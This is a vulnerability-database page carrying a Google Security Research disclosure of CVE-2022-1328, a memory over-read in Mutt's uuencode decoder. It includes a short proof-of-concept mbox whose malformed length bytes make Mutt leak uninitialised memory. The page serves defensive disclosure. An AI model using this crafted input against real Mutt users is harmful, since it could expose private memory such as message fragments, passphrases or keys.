Vulners
Lucene search
Mutt mutt_decode_uuencoded() Memory Disclosure
🗓️ 11 Jul 2022 00:00:00Reported by Tavis Ormandy, Google Security ResearchType 
packetstorm🔗 packetstormsecurity.com👁 362 Views
| Reporter | Title | Published | Views | Family All 118 |
|---|---|---|---|---|
 | mutt -- mutt_decode_uuencoded() can read past the of the input line | 4 Apr 202200:00 | – | freebsd |
 | CVE-2022-1328 | 14 Apr 202221:15 | – | attackerkb |
 | Amazon Linux 2 : mutt (ALAS-2022-1892) | 7 Dec 202200:00 | – | nessus |
| Amazon Linux AMI : mutt (ALAS-2023-1865) | 25 Oct 202300:00 | – | nessus |
| AlmaLinux 8 : mutt (ALSA-2022:7640) | 12 Nov 202200:00 | – | nessus |
| AlmaLinux 9 : mutt (ALSA-2022:8219) | 19 Nov 202200:00 | – | nessus |
| CentOS 8 : mutt (CESA-2022:7640) | 9 Nov 202200:00 | – | nessus |
| CentOS 9 : mutt-2.2.6-1.el9 | 29 Feb 202400:00 | – | nessus |
| Debian DLA-2999-1 : mutt - LTS security update | 11 May 202200:00 | – | nessus |
| EulerOS 2.0 SP5 : mutt (EulerOS-SA-2022-1904) | 17 Jun 202200:00 | – | nessus |
10
`mutt: mutt_decode_uuencoded() can read the past the of the input line
In mutt_decode_uuencoded(), the line length is read from the untrusted uuencoded part without validation. This could result in including private memory in replys, for example fragments of other messages, passphrases or keys.
Reproduce with the following mbox, note that these are literal 0x9f bytes. This should show some uninitialized garbage in the message.
From taviso Thu Mar 31 16:53:55 2022
From: taviso
Subject: mutt_decode_uuencoded test
Content-Disposition: inline
Content-Transfer-Encoding: x-uuencode
Content-Type: text/plain
begin 644 test
<9f>
M2&5L;&\\L\"@I)9B!Y;W4@87)E(')E861I;F<@=&AI<R!M97-S86=E(&EN(&UU
M='0L('1H92!N97AT(&QI;F4*<VAO=6QD(&-O;G1A:6X@9V%R8F%G92X*\"@H*
<9f>
54&QE87-E(')E<&QY+`I4879I<RX*
`
end.
This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is YYYY-MM-DD.
Related CVE Numbers: CVE-2022-1328.
Found by: [email protected]
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Jul 2022 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 25
CVSS 3.14.3 - 5.3
EPSS0.00271